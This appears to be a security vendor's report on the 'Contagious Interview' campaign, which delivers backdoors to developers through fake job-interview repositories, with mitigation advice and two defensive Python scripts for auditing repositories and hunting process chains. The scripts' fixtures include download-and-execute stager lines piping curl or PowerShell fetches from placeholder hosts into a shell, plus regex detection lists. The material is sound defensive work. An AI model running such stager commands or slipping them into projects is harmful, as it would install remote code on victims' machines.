Microsoft Defender Experts has uncovered a sophisticated social engineering campaign called "Contagious Interview" that delivers malware through fake developer job interviews, exploiting the trust inherent in recruitment workflows to target software developers at enterprise solution providers and media firms.
The Anatomy of a Fake Interview Attack
The campaign, active since at least December 2022, represents a significant evolution in initial access tradecraft. Rather than relying on traditional phishing or exploit-based techniques, threat actors have embedded targeted malware delivery directly into interview tools, coding exercises, and assessment workflows that developers inherently trust.
During periods of high motivation and time pressure, job seekers are more likely to lower their suspicion and resistance. The attackers exploit this psychological vulnerability by creating convincingly staged recruitment processes that mirror legitimate technical interviews, complete with recruiter outreach, technical discussions, assignments, and follow-ups.
Attack Chain Overview
The initial access typically begins when threat actors pose as recruiters from cryptocurrency trading firms or AI-based solution providers. Victims who fall for the lure are instructed to clone a repository from a popular code hosting platform such as GitHub, GitLab, or Bitbucket and run the NPM project it contains; installing the project's dependencies and running its scripts is what executes the malware.
In recent intrusions, threat actors have adapted their technique to leverage Visual Studio Code workflows. When victims open the cloned repository in Visual Studio Code, the Workspace Trust prompt asks whether they trust the authors of the files in the folder. If trust is granted, Visual Studio Code runs any task in the repository's .vscode/tasks.json that is configured to run on folder open (runOn: folderOpen), and that task fetches and loads the backdoor. Such automatic tasks never run in an untrusted (Restricted Mode) workspace, and the task.allowAutomaticTasks setting can disable them entirely.
Figure: a typical repository hosted on Bitbucket, posing as a blockchain-powered game.
Figure: a sample task from the repository's task configuration; its command fetches from a URL shortener that redirects to a vercel.app host.
The Malware Arsenal
The campaign employs several sophisticated backdoors, each serving different purposes in the attack chain:
InvisibleFerret - A Python-based backdoor used in later stages of the attack chain, enabling remote command execution, extended system reconnaissance, and persistent control after initial access has been secured by the primary backdoor.
FlexibleFerret - A modular backdoor implemented in both Go and Python variants. It leverages encrypted HTTP(S) and TCP command and control channels to dynamically load plugins, execute remote commands, and support file upload and download operations with full data exfiltration. Its plugin-based architecture, layered obfuscation, and configurable beaconing behavior contribute to its stealth and make analysis more challenging.
Code Quality Observations
Interestingly, recent samples exhibit characteristics that differ from traditionally engineered malware. The beaconing agent script contains inconsistent error handling, empty catch blocks, and redundant reporting logic that appear minimally refined. Similarly, the FlexibleFerret Python variant combines tutorial-style comments, emoji-based logging, and placeholder secret key markers alongside functional malware logic.
These patterns, together with the instructional narrative structure and rapid iteration cycles, suggest development workflows that prioritize speed and functional output over refined engineering. While such characteristics may indicate the use of development acceleration tools such as AI coding assistants, they primarily reflect evolving threat actor development practices and rapid tooling adaptation that enable quick iteration on malicious code.
Security Implications
This campaign weaponizes hiring processes into a persistent attack channel. Threat actors exploit technical interviews and coding assessments to execute malware through dependency installations and repository tasks, targeting developer endpoints that provide access to source code, CI/CD pipelines, and production infrastructure.
Threat actors harvest API tokens, cloud credentials, signing keys, cryptocurrency wallets, and password manager artifacts. Modular backdoors enable infrastructure rotation while maintaining access and complicating detection.
Mitigation and Protection Guidance
Organizations should treat recruitment workflows as attack surfaces by deploying isolated interview environments, monitoring developer endpoints and build tools, and hunting for suspicious repository activity and dependency execution patterns.
Harden Developer and Interview Workflows
Use a dedicated, isolated environment for coding tests and take-home assignments (for example, a non-persistent virtual machine). Do not use a primary corporate workstation that has access to production credentials, internal repositories, or privileged cloud sessions.
Establish a policy that requires review of any recruiter-provided repository before running scripts, installing dependencies, or executing tasks. Treat "paste-and-run" commands and "quick fix" instructions as high-risk.
Provide guidance to developers on common red flags: short links redirecting to file hosts, newly created repositories or accounts, unusually complex "assessment" setup steps, and instructions that request disabling security controls or trusting unknown repository authors.
Reduce Attack Surface from Tools Commonly Abused
Ensure tamper protection and real-time antivirus protection are enabled, and that endpoints receive security updates. These campaigns often rely on script execution and commodity tooling rather than exploiting a single vulnerability, so layered endpoint protection remains effective.
Restrict scripting and developer runtimes where possible (Node.js, Python, PowerShell). In high-risk groups, consider application control policies that limit which binaries can execute and where they can be launched from (for example, preventing developer tool execution from Downloads and temporary folders).
Monitor for and consider blocking common "download-and-execute" patterns used as stagers, such as curl/wget piping to shells, and outbound requests to low-reputation hosts used to serve payloads (including short-link redirection services).
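The pre-run review called for above, as an added example that is not code from Microsoft or the report: a Python audit that covers the two auto-execution hooks the campaign abuses (a VS Code task with runOn set to folderOpen, and npm lifecycle scripts that run during npm install) and flags download-and-execute stager patterns such as curl or wget piped into a shell and links through URL shorteners. The sample repository it builds, the shortener host list and the regexes are constructed assumptions.

```python
"""Pre-execution audit of a recruiter-supplied repository.

Added example, not code from the Microsoft report. The shortener list,
stager regexes and the sample repository built below are constructed.
"""
import json
import re
import tempfile
from dataclasses import dataclass
from pathlib import Path

# npm runs these script hooks on its own during `npm install`.
NPM_AUTO_HOOKS = {"preinstall", "install", "postinstall", "prepare"}

# Illustrative, non-exhaustive shortener hosts (assumption; extend per environment).
SHORTENER_HOSTS = {"bit.ly", "tinyurl.com", "t.co", "is.gd", "cutt.ly"}

# Assumed stager regexes; tune to your own telemetry.
STAGER_PATTERNS = [
    (r"\b(curl|wget)\b[^|;&]*\|\s*(ba|z|k)?sh\b", "pipe download to shell"),
    (r"\bnode\s+-e\b", "inline node eval"),
    (r"\bpython3?\s+-c\b", "inline python eval"),
    (r"\bpowershell\b.*\s-(e|enc|encodedcommand)\b", "encoded PowerShell"),
    (r"\b(iex|invoke-expression)\b", "PowerShell Invoke-Expression"),
]

@dataclass
class Finding:
    path: str
    hook: str
    command: str
    reasons: list

def _load_jsonc(text: str):
    # tasks.json is JSONC; drop whole-line // comments before parsing (simplification).
    return json.loads(re.sub(r"^\s*//.*$", "", text, flags=re.M))

def command_reasons(cmd: str) -> list:
    """Return the stager indicators present in one command string."""
    reasons = [label for pat, label in STAGER_PATTERNS if re.search(pat, cmd, re.I)]
    for host in re.findall(r"https?://([\w.-]+)", cmd):
        if host.lower() in SHORTENER_HOSTS:
            reasons.append(f"url shortener {host}")
    return reasons

def audit_repo(root) -> list:
    """Audit .vscode/tasks.json and package.json under root; return Findings."""
    root = Path(root)
    findings = []
    tasks_file = root / ".vscode" / "tasks.json"
    if tasks_file.exists():
        for task in _load_jsonc(tasks_file.read_text()).get("tasks", []):
            cmd = " ".join(str(x) for x in [task.get("command", ""), *task.get("args", [])])
            reasons = command_reasons(cmd)
            if task.get("runOptions", {}).get("runOn") == "folderOpen":
                reasons.insert(0, "runs automatically on folderOpen")
            if reasons:
                findings.append(Finding(".vscode/tasks.json", task.get("label", "?"), cmd, reasons))
    pkg_file = root / "package.json"
    if pkg_file.exists():
        for name, cmd in json.loads(pkg_file.read_text()).get("scripts", {}).items():
            reasons = command_reasons(cmd)
            if name in NPM_AUTO_HOOKS:
                reasons.insert(0, f"npm runs '{name}' during install")
            if reasons:
                findings.append(Finding("package.json", name, cmd, reasons))
    return findings

# Constructed lookalike of a lure repository; the URLs are placeholders, not live.
SAMPLE_TASKS_JSONC = """{
  // VS Code accepts comments here, so a plain JSON parser would choke
  "version": "2.0.0",
  "tasks": [
    {"label": "setup", "type": "shell",
     "command": "curl -sL https://bit.ly/not-a-real-link | bash",
     "runOptions": {"runOn": "folderOpen"}},
    {"label": "build", "type": "shell", "command": "npm run build"}
  ]
}"""
SAMPLE_PACKAGE_JSON = {
    "name": "blockchain-game",
    "scripts": {"postinstall": "node -e \"require('./lib/init')\"",
                "start": "node server.js", "test": "jest"},
}

def build_sample_repo() -> str:
    """Write the constructed sample into a temp directory and return its path."""
    root = Path(tempfile.mkdtemp(prefix="lure-"))
    (root / ".vscode").mkdir()
    (root / ".vscode" / "tasks.json").write_text(SAMPLE_TASKS_JSONC)
    (root / "package.json").write_text(json.dumps(SAMPLE_PACKAGE_JSON))
    return str(root)

if __name__ == "__main__":
    for f in audit_repo(build_sample_repo()):
        print(f"{f.path} [{f.hook}] {f.command}\n    -> {', '.join(f.reasons)}")
```

Run it against the cloned checkout before opening the folder in an editor or running npm install. On a machine used for take-home assignments it is also worth setting task.allowAutomaticTasks to off in VS Code, which stops folderOpen tasks from running at all, and installing with npm install --ignore-scripts, which skips the lifecycle hooks.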
Protect Secrets and Limit Downstream Impact
Reduce the exposure of secrets on developer endpoints. Use just-in-time and short-lived credentials, store secrets in vaults, and avoid long-lived tokens in environment files or local configuration.
Enforce multifactor authentication and conditional access for source control, CI/CD, cloud consoles, and identity providers to mitigate credential theft from compromised endpoints.
Review and restrict access to password manager vaults and developer signing keys. This campaign explicitly targets artifacts such as wallet material, password databases, private keys, and other high-value developer-held secrets.
Detect, Investigate, and Respond
Hunt for execution chains that start from a code editor or developer tool and quickly transition into shell or scripting execution (for example, Visual Studio Code or Cursor → cmd/PowerShell/bash → curl/wget → script execution).
Review repository task configurations and build scripts when such chains are observed.
Monitor Node.js and Python processes for behaviors consistent with this campaign, including broad filesystem enumeration for credential and key material, clipboard monitoring, screenshot capture, and HTTP POST uploads of collected data.
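The editor-to-downloader chain described above, as an added example that is not one of Microsoft's detections or hunting queries: a Python hunt over constructed process-creation events carrying the parent/child and command-line fields a DeviceProcessEvents-style table exposes. Every pid, path and URL in the sample is made up, and the time window, hop limit and image-name lists are assumptions to tune to your environment.

```python
"""Hunt for editor -> shell -> downloader -> script chains in process telemetry.

Added example, not a Microsoft detection. The sample events are constructed;
the image lists, window and hop limit are assumptions.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

EDITORS = {"code", "code.exe", "code helper (plugin)", "cursor", "cursor.exe"}
SHELLS = {"bash", "sh", "zsh", "cmd.exe", "powershell.exe", "pwsh", "pwsh.exe"}
DOWNLOADERS = {"curl", "curl.exe", "wget", "bitsadmin.exe", "certutil.exe"}
INTERPRETERS = {"node", "node.exe", "python", "python3", "python.exe",
                "bash", "sh", "powershell.exe", "pwsh.exe"}
# PowerShell downloads in-process, so match its cmdlets on the command line.
PS_DOWNLOAD = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile", re.I)
WINDOW = timedelta(minutes=5)   # shell start -> download start; assumption
MAX_HOPS = 4                    # editor may sit behind helper/pty-host processes

@dataclass(frozen=True)
class Event:
    ts: datetime
    pid: int
    ppid: int
    image: str
    cmdline: str

@dataclass
class Alert:
    editor: Event
    shell: Event
    downloader: Event
    followers: list   # interpreters the same shell spawned after the download

def is_downloader(e: Event) -> bool:
    return e.image in DOWNLOADERS or bool(PS_DOWNLOAD.search(e.cmdline))

def find_chains(events: list) -> list:
    """Return one Alert per downloader whose shell parent descends from an editor."""
    by_pid = {e.pid: e for e in events}   # assumes no pid reuse within the batch
    alerts = []
    for e in events:
        if not is_downloader(e):
            continue
        # A PowerShell downloader is its own shell; curl/wget hang off a shell parent.
        shell = e if e.image in SHELLS else by_pid.get(e.ppid)
        if shell is None or shell.image not in SHELLS:
            continue
        anc, hops = by_pid.get(shell.ppid), 0
        while anc is not None and anc.image not in EDITORS and hops < MAX_HOPS:
            anc, hops = by_pid.get(anc.ppid), hops + 1
        if anc is None or anc.image not in EDITORS:
            continue
        if e.ts - shell.ts > WINDOW:
            continue
        followers = [c for c in events
                     if c.ppid == shell.pid and c.pid != e.pid
                     and c.image in INTERPRETERS and c.ts >= e.ts]
        alerts.append(Alert(anc, shell, e, followers))
    return alerts

# Constructed sample telemetry: (timestamp, pid, ppid, image, command line)
SAMPLE = [
    # folderOpen task: editor-spawned shell pipes curl into bash, which starts python
    ("2024-05-01T09:00:00", 100, 1,   "code", "code /home/dev/blockchain-game"),
    ("2024-05-01T09:00:02", 101, 100, "bash", "/bin/bash -c curl -sL https://short.invalid/x | bash"),
    ("2024-05-01T09:00:02", 102, 101, "curl", "curl -sL https://short.invalid/x"),
    ("2024-05-01T09:00:03", 103, 101, "bash", "bash"),
    ("2024-05-01T09:00:05", 104, 103, "python3", "python3 /tmp/.n2/client.py"),
    # benign build task from the editor: no downloader in the chain
    ("2024-05-01T09:10:00", 200, 1,   "code", "code /home/dev/webapp"),
    ("2024-05-01T09:10:01", 201, 200, "bash", "/bin/bash -c npm run build"),
    ("2024-05-01T09:10:01", 202, 201, "node", "node build.js"),
    # benign curl from a standalone terminal: no editor ancestor
    ("2024-05-01T09:20:00", 300, 1,   "bash", "bash"),
    ("2024-05-01T09:20:30", 301, 300, "curl", "curl -O https://example.com/file.tgz"),
    # Windows variant: PowerShell downloads in-process, then runs node from Temp
    ("2024-05-01T09:30:00", 400, 1,   "cursor.exe", "cursor.exe C:\\src\\game"),
    ("2024-05-01T09:30:01", 401, 400, "powershell.exe", "powershell -nop -c iex (iwr https://short.invalid/p)"),
    ("2024-05-01T09:30:04", 402, 401, "node.exe", "node.exe C:\\Users\\dev\\AppData\\Local\\Temp\\s.js"),
]

def load_events(rows) -> list:
    return [Event(datetime.fromisoformat(ts), pid, ppid, img.lower(), cmd)
            for ts, pid, ppid, img, cmd in rows]

def hunt() -> list:
    return find_chains(load_events(SAMPLE))

if __name__ == "__main__":
    for a in hunt():
        chain = " -> ".join(p.image for p in (a.editor, a.shell, a.downloader))
        print(f"{a.downloader.ts:%H:%M:%S} {chain}; then {[f.image for f in a.followers]}")
```

An integrated terminal produces the same editor → shell ancestry, so the discriminating signals are the short gap between the shell starting and the download, and an interpreter that the same shell launches afterwards (the piped bash, or node reading a file from Temp); for each hit, review the task configuration of the folder that was opened before escalating.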
If compromise is suspected, isolate the device, rotate credentials and tokens that may have been exposed, review recent access to code repositories and CI/CD systems, and assess for follow-on payloads and persistence.
Detection Capabilities
Microsoft Defender XDR customers can leverage several detection capabilities to identify related activity:
- Suspicious process execution from NPM packages
- Suspicious Node.js process behavior
- Possible OtterCookie malware activity
- Suspicious Python library load
- Suspicious connection to remote service
- Enumeration of files with sensitive data
- System information discovery
- Suspicious clipboard access
Custom hunting queries are available to identify suspicious script executions, OtterCookie-related Node.js activity, possible Node.js beaconing agent activity, and credential enumeration activity.
The Contagious Interview campaign represents a sophisticated evolution in social engineering attacks, demonstrating how threat actors are increasingly targeting the trust inherent in legitimate business processes. By understanding these attack patterns and implementing appropriate defensive measures, organizations can better protect their developer ecosystems from this ongoing threat.
